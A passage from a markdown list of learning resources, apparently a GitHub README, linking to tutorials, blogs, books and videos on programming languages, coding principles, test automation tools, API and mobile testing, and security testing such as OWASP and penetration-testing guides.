Tests - Tutorials Teacher](https://www.tutorialsteacher.com/online-test/typescript-test) - [TypeScript Tutorial in VSCode](https://code.visualstudio.com/docs/typescript/typescript-tutorial) - [TypeScript](https://github.com/Microsoft/TypeScript) - [Awesome TypeScript](https://github.com/semlinker/awesome-typescript) - [Awesome TypeScript projects](https://github.com/brookshi/awesome-typescript-projects) - [TypeScript Tips](https://github.com/jellydn/typescript-tips) - [A curated list of awesome TypeScript resources](https://github.com/ellerbrock/awesome-typescript) </details> <details> <summary>Python</summary> - [Learn Python](https://www.learnpython.org/) - [Python Programming course on FreeCodeCamp](https://www.freecodecamp.org/news/python-programming-course/) - [Getting Started with Python - Python.org](https://www.python.org/about/gettingstarted/) - [Python for Beginners](https://learn.microsoft.com/en-us/windows/python/beginners) - [Introduction to Python](https://learn.microsoft.com/en-us/training/modules/intro-to-python/) - [Python Tutorial - Test Automation University ](https://testautomationu.applitools.com/python-tutorial/) - [Awesome Python](https://github.com/vinta/awesome-python) - [Awesome Python Books](https://github.com/junnplus/awesome-python-books) - [Python Tutorial - W3Schools](https://www.w3schools.com/python/) - [Python Programming - Programiz](https://www.programiz.com/python-programming) - [Learn Python - Kaggle.com](https://www.kaggle.com/learn/python) - [Python Full Course - Bro Code](https://www.youtube.com/watch?v=XKHEtdqhLK8) </details> <details> <summary>Data Structures & Algorithms</summary> - [Awesome Algorithms](https://github.com/tayllan/awesome-algorithms) - [DS & A - Programiz](https://www.programiz.com/dsa) - [DS & A in JavaScript](https://github.com/amejiarosario/dsa.js-data-structures-algorithms-javascript) - [DS & A Problems](https://github.com/mandliya/algorithms_and_data_structures) - [Algo Deck](https://github.com/teivah/algodeck) </details> <details> <summary>Other Learning Materials </summary> - [Project based learning](https://github.com/practical-tutorials/project-based-learning) </details> <details> <summary>Free Programming Books </summary> - [Programming in Java - An Interdisciplinary approach](https://introcs.cs.princeton.edu/java/home/) - [Python Cheat Sheet](https://www.pythoncheatsheet.org/) - [Free Computer Programming Books](https://freecomputerbooks.com/) - [300+ Best Free Programming Books](https://www.theinsaneapp.com/2021/01/free-programming-books.html) - [14 Excellent free books to learn Java](https://www.linuxlinks.com/excellent-free-books-learn-java/) - [Free JavaScript Books](https://gist.github.com/WebRTCGame/9fa80ed32a7413bd0f8d71304d6335eb) - [Pdfdrive.com](https://www.pdfdrive.com/) </details> # Coding Priciples <details> <summary>SOLID</summary> - [Solid Principles - Baeldung](https://www.baeldung.com/solid-principles) - [Solid Principles - Howtodoinjava](https://howtodoinjava.com/best-practices/solid-principles/) - [Design Principles in Java](https://www.javatpoint.com/design-principles-in-java) </details> <details> <summary>KISS</summary> - [Kiss software design principle - Baeldung](https://www.baeldung.com/cs/kiss-software-design-principle) - [How to use KISS Principle in design - FreeCodeCamp](https://www.freecodecamp.org/news/keep-it-simple-stupid-how-to-use-the-kiss-principle-in-design/) - [Programming - Rules of Thumb](https://wou.edu/las/cs/csclasses/cs161/Lectures/rulesofthumb.html) </details> <details> <summary>YAGNI</summary> - [YAGNI - Martin Fowler](https://martinfowler.com/bliki/Yagni.html) - [Deep Dive in KISS and YAGNI](https://solidstudio.io/blog/deep-dive-into-kiss-and-yagni) </details> <details> <summary>DRY</summary> - [DRY, KISS & YAGNI Principles](https://henriquesd.medium.com/dry-kiss-yagni-principles-1ce09d9c601f) - [DRY Software Design Principle](https://www.baeldung.com/cs/dry-software-design-principle) - [DRY (Don’t Repeat Yourself) In Java](https://www.w3schools.blog/dry-dont-repeat-yourself-in-java) </details> <details> <summary>OOPS</summary> - [Object-Oriented Programming Principles  in Java:  OOP Concepts for Beginners](https://www.freecodecamp.org/news/java-object-oriented-programming-system-principles-oops-concepts-for-beginners/) - [How to explain object-oriented programming concepts to a 6-year-old](https://www.freecodecamp.org/news/object-oriented-programming-concepts-21bb035f7260/) - [What are four basic principles of Object Oriented Programming?](https://medium.com/@cancerian0684/what-are-four-basic-principles-of-object-oriented-programming-645af8b43727) </details> # Software Testing <details> <summary>Free Tutorials and Courses</summary> - [Software Testing Help](https://www.softwaretestinghelp.com/) - [Test Automation University](https://testautomationu.applitools.com/) - [LambdaTest Learning Hub](https://www.lambdatest.com/learning-hub/) - [Guru99.com](https://www.guru99.com/software-testing.html) - [Software Testing Material](https://www.softwaretestingmaterial.com/) - [Free Code Camp](https://www.freecodecamp.org/news/tag/software-testing/) - [Postman Learning Centre](https://learning.postman.com/docs/getting-started/introduction/) - [BlazeMeter University](https://www.blazemeter.com/university) - [Automation Testing for Beginner's - Ultimate Guide](https://blog.testproject.io/2020/03/26/automation-testing-for-beginners-ultimate-guide/) - [Setting a Foundation for Successful Test Automation](https://testautomationu.applitools.com/setting-a-foundation-for-successful-test-automation/) - [Beyond Bugs: Exploring the Depths of Software Testing](https://medium.com/@iamfaisalkhatri/beyond-bugs-exploring-the-depths-of-software-testing-6a3b7057060e) - [Practical Guide on Continuous Integration for automation tests](https://medium.com/@iamfaisalkhatri/practical-guide-on-continuous-integration-for-automation-tests-vtest-blog-23e6d37f523f) - [Best Examples of Functional Test Cases](https://medium.com/@iamfaisalkhatri/best-examples-of-functional-test-cases-agilitest-blog-424260298b5) - [Best Practices for Test Automation Framework](https://medium.com/@iamfaisalkhatri/best-practices-for-test-automation-framework-vtest-blog-277ee1682e24) - [Parallel Execution of Tests using Selenium Grid 4 with Docker Compose](https://medium.com/@iamfaisalkhatri/parallel-execution-of-tests-using-selenium-grid-4-with-docker-compose-2dc243f4fe8b) </details> <details> <summary>Software Testing/Test Automation/Blogs and Guides</summary> - [Marting Fowler's Blog](https://martinfowler.com/tags/testing.html) - [Angie Jone's Blog](https://angiejones.tech/) - [Corina Pip's Blog](https://imalittletester.com/) - [Filip hrics's Blog](https://filiphric.com/) - [Alan Richardson's Blog](https://www.eviltester.com/blog/) - [Mohammad Faisal Khatri's Blog](https://medium.com/@iamfaisalkhatri) - [Jason Swett's Blog(Has a good collection of blogs related to ruby rails testing, docker and other testing stuff)](https://www.codewithjason.com/articles/) - [Test Guild by Joe Colantonio](https://testguild.com/blog/) - [Dan Ashby's Blog](https://danashby.co.uk/) - [Google Testing Blog](https://testing.googleblog.com/) - [TestProject's Blog](https://blog.testproject.io/) - [LambdaTest Blog](https://www.lambdatest.com/blog/) - [LambdaTest Learning Hub](https://www.lambdatest.com/learning-hub/) - [pCloudy Blog ](https://www.pcloudy.com/blog/) - [VTest Software Corp Blog](https://www.vtestcorp.com/blog/) - [BrowserStack Blog](https://www.browserstack.com/blog/) - [Software Testing News](https://www.softwaretestingnews.co.uk/) - [OnTestAutomation](https://www.ontestautomation.com/blog/) - [Articles by Lisa Crispin](https://lisacrispin.com/articles/) - [Wasiq Bhamla's Blog](https://medium.com/@WasiqB) - [How they test?](https://github.com/abhivaikar/howtheytest) </details> <details> <summary>YouTube Channels</summary> - [Selenium Conference](https://www.youtube.com/@seleniumconf) - [Appium Conference](https://www.youtube.com/playlist?list=PL9Z-JgiTsOYRCcJhDfmKAah9XmAp2b903) - [Conf Engine](https://www.youtube.com/@ConfEngine) - [GOTO Conferences](https://www.youtube.com/@GOTO-) - [O'Reilly](https://www.youtube.com/@oreilly) - [Programming with Mosh](https://www.youtube.com/@programmingwithmosh) - [Free Code Camp](https://www.youtube.com/@freecodecamp) - [LambdaTest](https://www.youtube.com/@LambdaTest) - [Automation Testing with Joe Colantonio](https://www.youtube.com/@JoeColantonio) - [Front-end Testing with Kevin](https://www.youtube.com/@frontendtesting) - [BrowserStack](https://www.youtube.com/@Browserstack) - [Sauce Labs](https://www.youtube.com/@SauceLabs_Official) - [Faisal Khatri](https://www.youtube.com/@faisalkhatriqa) - [Learn Test Automation with Wasiq Bhamla](https://www.youtube.com/@WasiqBhamla) </details> <details> <summary>Software Testing Books</summary> - [Software Testing Books](https://github.com/clarabez/SoftwareTestingBooks) - [Free Software Testing books](https://github.com/bigfool/free-software-testing-books/blob/master/free-software-testing-books.md#standards-in-software-testing) - [Software Testing : A Craftsman's approach](https://malenezi.github.io/malenezi/SE401/Books/Software-Testing-A-Craftsman-s-Approach-Fourth-Edition-Paul-C-Jorgensen.pdf) - [Agile Testing by Lisa Crispin](https://www.pdfdrive.com/agile-testing-e47964421.html) - [The art of software testing](https://www.pdfdrive.com/the-art-of-software-testing-3rd-edition-e166742955.html) - [Complete Guide to Test Automation -Arnon Axelrod](https://www.pdfdrive.com/complete-guide-to-test-automation-techniques-practices-and-patterns-for-building-and-maintaining-effective-software-projects-e184708672.html) - [Experiences of Test Automation: Case Studies of Software Test Automation](https://www.pdfdrive.com/experiences-of-test-automation-case-studies-of-software-test-automation-e195404210.html) - [Software Quality Engineering: Testing, Quality Assurance, and Quantifable Improvement](https://www.pdfdrive.com/software-quality-engineering-testing-quality-assurance-and-e16540425.html) </details> <details> <summary>Test Pyramid </summary> - [Practical Test Pyramid - Martin Fowler](https://martinfowler.com/articles/practical-test-pyramid.html) </details> # Git <details> <summary>Free Tutorials </summary> - [Source Control for Test Automation with Git](https://testautomationu.applitools.com/git-tutorial/) - [Git & GitHub FreeCodeCamp Playlist](https://youtube.com/playlist?list=PLWKjhJtqVAbkFiqHnNaxpOPhh9tSWMXIF) - [Git for Professionals Tutorial - Tools & Concepts for Mastering Version Control with Git](https://www.youtube.com/watch?v=Uszj_k0DGsg) - [Advanced Git Tutorial - Interactive Rebase, Cherry-Picking, Reflog, Submodules and more](https://youtu.be/qsTthZi23VEGit) - [Git Branches Tutorial](https://youtu.be/e2IbNHi4uCI) - [Learn Git Branching](https://learngitbranching.js.org/) - [GitHub Skills](https://skills.github.com/) - [Learn Git with Bitbucket Cloud](https://www.atlassian.com/git/tutorials/learn-git-with-bitbucket-cloud) - [Learn Enough Git to Be Dangerous - Michael Hartl](https://www.learnenough.com/git-tutorial) - [Git cheat sheet download](https://education.github.com/git-cheat-sheet-education.pdf) </details> # Web Automation <details> <Summary>Selenium WebDriver</Summary> - [Selenium WebDriver Documentation](https://www.selenium.dev/documentation/) - [Selenium Locator Strategies](https://www.selenium.dev/documentation/webdriver/elements/locators/) - [Selenium WebDriver with Java](https://testautomationu.applitools.com/selenium-webdriver-tutorial-java/) - [Selenium 4 in Java](https://testautomationu.applitools.com/selenium-4-java/) - [Selenium WebDriver with Python](https://testautomationu.applitools.com/selenium-webdriver-python-tutorial/) - [Selenium with JavaScript](https://www.selenium.dev/selenium/docs/api/javascript/index.html) - [From Scripting to Framework with Selenium and C#](https://testautomationu.applitools.com/test-automation-framework-csharp/) - [Codeless Test automation with Selenium IDE](https://testautomationu.applitools.com/codeless-test-automation-with-selenium-ide/) - [Intro to Selenium WebDriver with .NET Core](https://testautomationu.applitools.com/intro-to-selenium-webdriver-with-net-core/) - [Selenium WebDriver with Ruby](https://testautomationu.applitools.com/selenium-webdriver-with-ruby/) - [Free Selenium WebDriver Course](https://automationintesting.com/selenium/java/course/) - [Seleniumeasy.com](https://www.seleniumeasy.com/) - [Selenium WebDriver example code](https://github.com/mfaisalkhatri/selenium4poc) - [Selenium Tutorial - SoftwareTestingMaterial](https://www.softwaretestingmaterial.com/selenium-tutorial/) - [Selenium Tutorial - SoftwareTestingHelp](https://www.softwaretestinghelp.com/selenium-tutorial-1/) - [Selenium 4 WebDriver Hierarchy](https://www.lambdatest.com/blog/selenium-4-webdriver-hierarchy/) - [How to handl dynamic dropdowns in Selenium](https://www.lambdatest.com/blog/handling-dropdowns-in-selenium-webdriver-java/) - [How To Automate Shadow DOM In Selenium WebDriver](https://www.lambdatest.com/blog/shadow-dom-in-selenium/) - [Writing Selenium Web Automation tests in Fluent way!](https://medium.com/@iamfaisalkhatri/writing-selenium-web-automation-tests-in-fluent-way-864db95ee67a) - [End to End Testing using Selenium WebDriver and Java](https://medium.com/@iamfaisalkhatri/end-to-end-testing-using-selenium-webdriver-and-java-4ff8667716ca) - [Blogs related to Selenium WebDriver by LambdaTest](https://www.lambdatest.com/blog/?s=selenium+webdriver) - [Understanding CSS Selectors in Selenium](https://www.pcloudy.com/blogs/understanding-css-selectors-in-selenium/) - [Everything you need to know about the Selenium IDE: Tutorial](https://www.pcloudy.com/blogs/everything-you-need-to-know-about-the-selenium-ide-tutorial/) - [Executing Parallel Test Sessions with TestNG and Selenium WebDriver](https://www.pcloudy.com/blogs/executing-parallel-test-sessions-with-testng-and-selenium-webdriver/) - [Parallel Execution of Tests using Selenium Grid 4 with Docker Compose](https://medium.com/@iamfaisalkhatri/parallel-execution-of-tests-using-selenium-grid-4-with-docker-compose-2dc243f4fe8b) </details> <details> <summary>Playwright</summary> - [Playwright Documentation - Nodejs](https://playwright.dev/docs/intro) - [Playwright Documentation - Java](https://playwright.dev/java/docs/intro) - [Playwright Documentation - Python](https://playwright.dev/python/docs/intro) - [Playwright Documentation - .NET](https://playwright.dev/dotnet/docs/intro) - [Playwright - YouTube](https://www.youtube.com/channel/UC46Zj8pDH5tDosqm1gd7WTg) - [Playwright Locators](https://playwright.dev/docs/locators) - [Playwright with JavaScript](https://testautomationu.applitools.com/js-playwright-tutorial/) - [What is Microsoft Playwright JS?](https://testguild.com/what-is-microsoft-playwright-js/) - [Testing Modern Web Apps with Playwright | OD110](https://www.youtube.com/watch?v=sAY9FmBih08) - [An End To End Playwright Testing with TypeScript](https://www.youtube.com/watch?v=wawbt1cATsk) - [Playwright Tutorial: Getting Started With Playwright Framework](https://www.lambdatest.com/blog/playwright-framework/) - [Playwright - Github](https://github.com/microsoft/playwright) - [Playing with Playwright](https://applitools.com/blog/playing-with-playwright/) - [Interactive website to learn playwright](https://try.playwright.tech/) </details> <details> <summary>Cypress</summary> - [Cypress Documentation](https://docs.cypress.io/guides/overview/why-cypress) - [Introduction to Cypress](https://testautomationu.applitools.com/cypress-tutorial/) - [Cypress with TypeScript](https://testautomationu.applitools.com/cypress-with-typescript/) - [Advanced Cypress](https://testautomationu.applitools.com/advanced-cypress-tutorial/) - [Filip Hric's blogs on Cypress](https://filiphric.com/blog) - [Cypress Testing Tutorial](https://www.youtube.com/watch?v=jX3v3N6oN5M) - [Learn Cypress](https://learn.cypress.io/) - [Cypress - Youtube](https://www.youtube.com/@Cypressio) </details> <details> <summary>WebDriverIO </summary> - [WebdriverIO](https://webdriver.io/) - [WebDriverIO - YouTube](https://www.youtube.com/watch?v=GAc031zGWTM&list=PLPO0LFyCaSo3oedws079pCNtppXAZdjv6) - [UI Automation with WebdriverIO v7](https://testautomationu.applitools.com/webdriverio-7-tutorial/) - [Automated Visual Testing with WebdriverIO](https://testautomationu.applitools.com/automated-visual-testing-javascript-webdriverio/) - [WebApp Testing with WebdriverIO - Crash Course](https://www.youtube.com/watch?v=RJ2kwpzX8so) - [WebDriverIo v8 Must Know Features with Christian Bromann](https://www.youtube.com/watch?v=OZXVcK-dJkQ) - [WebDriverIO and Extended Debugging with Christian Bromann](https://www.youtube.com/watch?v=aX5TLGKhTKM) - [WebDriverIO Wednesdays with Kevin](https://www.youtube.com/watch?v=k6FFwurWhf0&list=PL0y7qCn3hjLYGdFtm_qvF0mCdFnBKs2C7) - [WebdriverIO - Github](https://github.com/webdriverio/webdriverio) </details> <details> <summary>Capybara</summary> - [Introduction to Capybara](https://testautomationu.applitools.com/capybara-ruby/) </details> # API Testing <details> <summary>Introduction to API Testing</summary> - [REST API Concepts and examples](https://www.youtube.com/watch?v=7YcW25PHnAA) - [Testing Strategies in a Microservice Architecture](https://martinfowler.com/articles/microservice-testing/) - [What is an API? API for Beginners](https://www.youtube.com/watch?v=GZvSYJDk-us) - [What is API Testing?](https://mfaisalkhatri.github.io/2020/08/08/apitesting/) - [API Testing Tutorial](https://www.softwaretestinghelp.com/api-testing-tutorial/) - [A Comprehensive API Testing Guide](https://www.softwaretestingmaterial.com/api-testing/) - [Getting Started With Testing Microservices](https://alexromanov.github.io/2021/06/28/microservices-test-resources/) - [JSON.org](https://www.json.org/json-en.html) - [What is JSON?](https://www.w3schools.com/whatis/whatis_json.asp) </details> <details> <summary>Postman</summary> - [Postman Learning Center](https://learning.postman.com/docs/getting-started/introduction/) - [15 days of Postman for Testers](https://www.postman.com/postman/workspace/15-days-of-postman-for-testers/overview) - [Postman Beginner's Course - API Testing](https://www.youtube.com/watch?v=VywxIQ2ZXw4) - [Postman API Crash Course - Clever Programmer](https://www.youtube.com/watch?v=Iq7eh6DhN6M) - [Postman end to end Tutorials Saravanan Seenivasan](https://www.youtube.com/@SaravananSeenivasan) - [API Testing Videos by Dimpy Adhikary - DTestHive](https://www.youtube.com/@DTestHive) - [API Test Automation with Postman](https://testautomationu.applitools.com/postman-tutorial/) - [Exploring Service APIs through Test Automation](https://testautomationu.applitools.com/exploring-service-apis-through-test-automation/) - [newman](https://github.com/postmanlabs/newman) - [Postman blogs](https://blog.postman.com/) - [Using Postman Environment Variables & Auth Tokens](https://medium.com/@codebyjeff/using-postman-environment-variables-auth-tokens-ea9c4fe9d3d7) - [API Testing using Postman](https://medium.com/aubergine-solutions/api-testing-using-postman-323670c89f6d) </details> <details> <summary>Rest Assured</summary> - [rest-assured.io](https://rest-assured.io/) - [Rest Assured Usage Guide](https://github.com/rest-assured/rest-assured/wiki/Usage) - [Automating your API tests with REST Assured](https://testautomationu.applitools.com/automating-your-api-tests-with-rest-assured/) - [A Guide to REST-assured](https://www.baeldung.com/rest-assured-tutorial) - [End to End API Testing using rest-assured](https://medium.com/@iamfaisalkhatri/end-to-end-api-testing-using-rest-assured-a58c4ea80255) - [How to perform API testing with REST Assured](https://techbeacon.com/app-dev-testing/how-perform-api-testing-rest-assured) - [James Willett - Rest Assured blogs](https://www.james-willett.com/blog/restassured/) - [Rest Assured Example code](https://github.com/mfaisalkhatri/rest-assured-examples) - [REST API Automation From Scratch](https://blog.testproject.io/2021/07/28/rest-api-automation-from-scratch/) - [Rest Assured Tutorial](https://mindmajix.com/rest-assured-tutorial) - [Creating data driven API tests with REST Assured and TestNG](https://www.ontestautomation.com/creating-data-driven-api-tests-with-rest-assured-and-testng/) - [How to perform JSON Schema Validation using Rest-Assured?](https://medium.com/@iamfaisalkhatri/how-to-perform-json-schema-validation-using-rest-assured-64c3b6616a91) </details> <details> <summary>SuperTest</summary> - [SuperTest](https://www.npmjs.com/package/supertest) - [API Testing in JavaScript](https://testautomationu.applitools.com/javascript-api-testing/) - [Dead-Simple API Tests With SuperTest, Mocha, and Chai](https://dev-tester.com/dead-simple-api-tests-with-supertest-mocha-and-chai/) - [API Testing using SuperTest](https://medium.com/@iamfaisalkhatri/api-testing-using-supertest-ea37522fa329) - [API Testing using Jest and SuperTest](https://www.testingwithmarie.com/post/api-testing-using-jest-and-supertest) </details> <details> <summary>Playwright</summary> - [API Testing with Playwright](https://playwright.dev/docs/test-api-testing) - [Using Playwright for API testing](https://reflect.run/articles/using-playwright-for-api-testing/) - [API Testing with Playwright - GitHub](https://github.com/microsoft/playwright/blob/main/docs/src/test-api-testing-js.md) </details> <details> <summary>Cypress</summary> - [API & Integration Tests](https://learn.cypress.io/advanced-cypress-concepts/integration-and-api-tests) - [A Step-By-Step Guide To Cypress API Testing](https://www.lambdatest.com/blog/cypress-api-testing/) - [Cypress basics: API testing](https://filiphric.com/cypress-basics-api-testing) - [API Testing with Cypress Series' Articles](https://dev.to/murillowelsi/series/12873) - [Advanced Cypress](https://testautomationu.applitools.com/advanced-cypress-tutorial/) - [How To Test API With Cypress | Filip Hric | Testμ 2022 | LambdaTest](https://www.youtube.com/watch?v=kENXELkT4O4) </details> <details> <summary>GraphQL</summary> - [GraphQL](https://graphql.org/) - [GraphQL - GitHub](https://github.com/graphql) - [A Beginner’s Guide to GraphQL](https://www.freecodecamp.org/news/a-beginners-guide-to-graphql-86f849ce1bec/) - [Testing GraphQL API](https://blog.testproject.io/2020/06/23/testing-graphql-api/) - [How to Test your GraphQL Endpoints](https://escape.tech/blog/testing-your-graphql-api/) - [Writing Tests for GraphQL APIs using REST Assured](https://applitools.com/blog/writing-tests-graphql-apis-rest-assured/) - [GraphQL Guides](https://www.graphql.com/guides/) </details> <details> <summary>gRPC</summary> - [Introduction to gRPC](https://grpc.io/docs/what-is-grpc/introduction/) - [gRPC overview](https://learning.postman.com/docs/sending-requests/grpc/grpc-client-overview/) - [gRPC - QuickStart](https://grpc.io/docs/languages/java/quickstart/) - [The Beginner's Guide to gRPC with Examples](https://tamerlan.dev/the-beginners-guide-to-grpc-with-examples/) - [awesome-gRPC](https://github.com/grpc-ecosystem/awesome-grpc) - [Postman v10 and gRPC: what you can do](https://blog.postman.com/postman-v10-and-grpc-what-you-can-do/) - [Public gRPC APIs](https://www.postman.com/devrel/workspace/public-grpc-apis/overview) - [What is gRPC? Protocol Buffers, Streaming, and Architecture Explained](https://www.freecodecamp.org/news/what-is-grpc-protocol-buffers-stream-architecture/) - [gRPC - Microsoft learning](https://learn.microsoft.com/en-us/dotnet/architecture/cloud-native/grpc) </details> # Mobile Automation <details> <summary>Mobile Testing</summary> - [Guide to Mobile Testing](https://medium.com/@iamfaisalkhatri/guide-to-mobile-testing-d0dd2d9b59f1) - [Mobile App Testing Guide](https://blog.qatestlab.com/2020/09/04/mobile-app-testing-guide/) - [Mobile Automation Testing Tools](https://www.lambdatest.com/blog/best-mobile-automation-testing-tools/) - [How to install Android Studio on Windows 10](https://youtu.be/CMrfuCR6W94) - [What is an Android Emulator? How to Start and use it?](https://medium.com/@iamfaisalkhatri/what-is-an-android-emulator-how-to-start-and-use-it-66fdcf52be7e) - [Emulator vs Simulator For Mobile Testing: Differences & Setup](https://www.lambdatest.com/blog/difference-between-emulator-vs-simulator-for-mobile-testing/) - [Mobile App Testing Tutorials (A Complete Guide With 30+ Tutorials)](https://www.softwaretestinghelp.com/beginners-guide-to-mobile-application-testing/) - [Mobile App Testing Tutorial: A Comprehensive Guide With Examples and Best Practices](https://www.lambdatest.com/learning-hub/mobile-app-testing) - [Mobile Application Testing using Automation frameworks](https://www.browserstack.com/guide/mobile-application-testing-frameworks) </details> <details> <summary>Appium</summary> - [Appium Conference](https://www.youtube.com/playlist?list=PL9Z-JgiTsOYRCcJhDfmKAah9XmAp2b903) - [Appium.io](https://appium.io/) - [Appium Desired Capabilities](https://appium.io/docs/en/writing-running-appium/caps/) - [Appium 2.0 Documentation](https://appium.github.io/appium/docs/en/2.0/) - [Beginner’s Guide to Appium 2.0](https://medium.com/@iamfaisalkhatri/beginners-guide-to-appium-2-0-d8118b31837c) - [Appium Inspector](https://github.com/appium/appium-inspector) - [Appium Desktop](https://github.com/appium/appium-desktop) - [Setting up Appium on MAC for automating iOS App](https://wasiqb.github.io/blogs/appium-automation-ios) - [BEGINNERS GUIDE TO APPIUM AUTOMATION WITH JAVA FOR ANDROID APPS](https://wasiqb.wordpress.com/2017/04/19/beginners-guide-to-appium-automation-with-java-for-android-apps-part-2/) - [Inspecting elements of an app using Appium Inspector and BrowserStack!](https://medium.com/@iamfaisalkhatri/inspecting-elements-of-an-app-using-appium-inspector-and-browserstack-32c095a5333c) - [Mobile Automation with Appium in Java](https://testautomationu.applitools.com/appium-java-tutorial/) - [Mobile Automation with Appium in JavaScript](https://testautomationu.applitools.com/appium-javascript-tutorial/) - [Automated Mobile App Testing using Appium and Python](https://blog.testproject.io/2019/07/16/automated-mobile-app-using-appium-and-python/) - [Appium Version 2.0 Fundamentals](https://university.blazemeter.com/) - [Getting started with Appium 2.0: Your beginner’s guide](https://bitrise.io/blog/post/getting-started-with-appium-2-0-your-beginners-guide) - [How To Identify Locators In Appium [With Examples]](https://www.lambdatest.com/blog/locators-in-appium/) - [Automated App testing using Appium with TestNG](https://www.lambdatest.com/blog/appium-with-testng-tutorial/) - [How To Test React Native Apps On iOS And Android](https://www.lambdatest.com/blog/test-react-native-apps-on-ios-and-android/) - [Complete Tutorial On Appium Parallel Testing [With Examples]](https://www.lambdatest.com/blog/appium-parallel-testing/) - [How to start Appium Server Programmatically?](https://medium.com/@iamfaisalkhatri/how-to-start-appium-server-programmatically-ec07292ab59) - [Appium 2.0 Plugins](https://appium.github.io/appium/docs/en/2.0/ecosystem/#plugins) - [Appium Gestures Plugin](https://github.com/AppiumTestDistribution/appium-gestures-plugin) - [Build your own Appium 2.0 Driver by Srinivasan Sekar & Sai Krishna #SeConf 2022](https://www.youtube.com/watch?v=DWoqcZc3D5Y) </details> <details> <summary>Flutter</summary> - [Automating Tests for Flutter Apps](https://testautomationu.applitools.com/testing-flutter-apps/) - [Flutter Testing Guide for Beginners - Part 1: Unit Tests & Setup](https://www.youtube.com/watch?v=hUAUAkIZmX0) - [Flutter Testing Guide for Beginners – Part 2: Widget & Integration Tests](https://www.youtube.com/watch?v=Ghqry5dtgH4) - [Automated Flutter App Testing](https://testingbot.com/support/mobile/flutter.html) - [Testing Flutter apps](https://docs.flutter.dev/testing) - [Automating Flutter Apps with Appium Flutter Driver using Appium Java Client](https://testsigma.com/blog/automating-flutter-apps-with-appium-flutter-driver/) - [Appium Flutter Finder Java](https://github.com/ashwithpoojary98/javaflutterfinder) - [CommonFinders Class Flutter](https://api.flutter.dev/flutter/flutter_test/CommonFinders-class.html) - [Appium Flutter Driver](https://github.com/appium-userland/appium-flutter-driver) - [Flutter App Test Automation poc | Appium Flutter Driver| Flutter Finder](https://www.youtube.com/watch?v=fsfMw_e7e9U) - [Automated Flutter App Testing - Testingbot](https://testingbot.com/support/mobile/flutter.html#start) - [Appium Flutter Driver - A Use Case Demo by Atmaram Naik](https://www.youtube.com/watch?v=hv74YaISJSg) </details> <details> <summary>WebdriverIO </summary> - [WebdriverIO documentation](https://webdriver.io/docs/gettingstarted) - [Mobile Selectors](https://webdriver.io/docs/selectors#mobile-selectors) - [Appium boilerplate](https://github.com/webdriverio/appium-boilerplate/) - [Mobile e2e tests using WebdriverIO and Appium](https://dev.to/fmo91/mobile-e2e-tests-using-webdriverio-and-appium-4071) - [Appium Service](https://webdriver.io/docs/appium-service) - [Guide to setup appium webdriverIO project to test android | ios application](https://www.youtube.com/watch?v=Sk9CQ3BaW_w) </details> # Security Testing <details> <summary>Tutorials</summary> - [OWASP Top 10](https://owasp.org/www-project-top-ten/) - [ZAProxy](https://www.zaproxy.org/) - [Security Testing Guide](https://github.com/OWASP/wstg/tree/master/document) - [Security Testing Tutorial](https://www.softwaretestingmaterial.com/security-testing-tutorial/) - [OWASP Web Security Testing Guide](https://www.softwaretestinghelp.com/how-to-test-application-security-web-and-desktop-application-security-testing-techniques/) - [Web Application Security Testing Guide](https://www.softwaretestinghelp.com/security-testing-of-web-applications/) - [Security Testing](https://www.geeksforgeeks.org/software-testing-security-testing/) - [OWASP Mobile Security](https://owasp.org/www-project-mobile-app-security/) - [Hacksplaining](https://www.hacksplaining.com/owasp) - [OWASP Top 10 Vulnerabilities](https://www.softwaretestinghelp.com/owasp-top-10-security-vulnerabilities/) - [OWASP Top 10 2021](https://owasp.org/Top10/) - [OWASP Top 10 tools and tactics](https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/) - [awesome-security](https://github.com/sbilly/awesome-security) - [awesome web security](https://github.com/qazbnm456/awesome-web-security) - [awesome Hacking](https://github.com/qazbnm456/awesome-web-security) - [awesome web hacking](https://github.com/infoslack/awesome-web-hacking) - [awesome mobile security](https://github.com/vaib25vicky/awesome-mobile-security) - [awesome-appsec](https://github.com/paragonie/awesome-appsec) - [awesome-api-security](https://github.com/arainho/awesome-api-security) - [Threat Modelling](https://owasp.org/www-community/Threat_Modeling) - [What is Threat Modelling and How does it work?](https://www.mygreatlearning.com/blog/what-is-threat-modeling-and-how-does-it-work/) - [What is CVE?](https://www.redhat.com/en/topics/security/what-is-cve) </details> <details> <summary>Penetration Testing</summary> - [Penetration testing guide](https://www.softwaretestinghelp.com/penetration-testing-guide/) - [Pentesterlabs](https://pentesterlab.com/) - [The Beginner’s Guide to API Hacking - DANA EPP'S BLOG](https://danaepp.com/beginners-guide-to-api-hacking) - [Hacking APIs: Workshop - Corey Ball](https://sway.office.com/HVrL2AXUlWGNDHqy) - [MalAPI by mrd0x](https://malapi.io/) - [What is DAST?](https://www.softwaretestinghelp.com/what-is-dast/) - [What is RAST?](https://www.softwaretestinghelp.com/rasp-tutorial/) - [What is SAST](https://www.softwaretestinghelp.com/sast-tutorial/) - [What is IAST](https://www.softwaretestinghelp.com/what-is-iast/) - [Difference between DAST,SAST, IAST and RAST](https://www.softwaretestinghelp.com/differences-between-sast-dast-iast-and-rasp/) - [SAST, DAST and IAST](https://www.getastra.com/blog/security-audit/interactive-application-security-testing/) - [CyberSecurity - Codeacademy](https://www.codecademy.com/catalog/subject/cybersecurity) - [Collection of Penetration Testing resources](https://github.com/wtsxDev/Penetration-Testing#penetration-testing-resources) - [Penetration Testing Full Course - FreeCodeCamp.org](https://www.freecodecamp.org/news/full-penetration-testing-course/) </details> <details> <summary>YouTube Channels</summary> - [OWASP Foundation](https://www.youtube.com/@OWASPGLOBAL) - [OWASP Top 10 2021 - The List and How You Should Use It](https://www.youtube.com/watch?v=hryt-rCLJUA) - [2021 OWASP Top Ten Overview - F5 DevCentral](https://www.youtube.com/watch?v=uu7o6hEswVQ&list=PLyqga7AXMtPOguwtCCXGZUKvd2CDCmUgQ) - [API hacking for the Actually Pretty Inexperienced hacker with Katie Paxton-Fear](https://www.youtube.com/watch?v=qqmyAxfGV9c) - [OWASP Devslop](https://www.youtube.com/@OWASPDevSlop) - [A Starters Guide to Pentesting with OWASP](https://www.youtube.com/watch?v=AO_sqXb-gKE) - [Actionable Security Testing Tips on the TestGuild Security Testing](https://www.youtube.com/playlist?list=PL9AgRtJkydU3JzSZcwWxMwrrzg9SSGWwH) </details> <details> <summary>Security Testing Tools</summary> - [Vulnerability Scanning Tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools) - [19 Powerful Penetration Testing tools](https://www.softwaretestinghelp.com/penetration-testing-tools/) - [Top 10 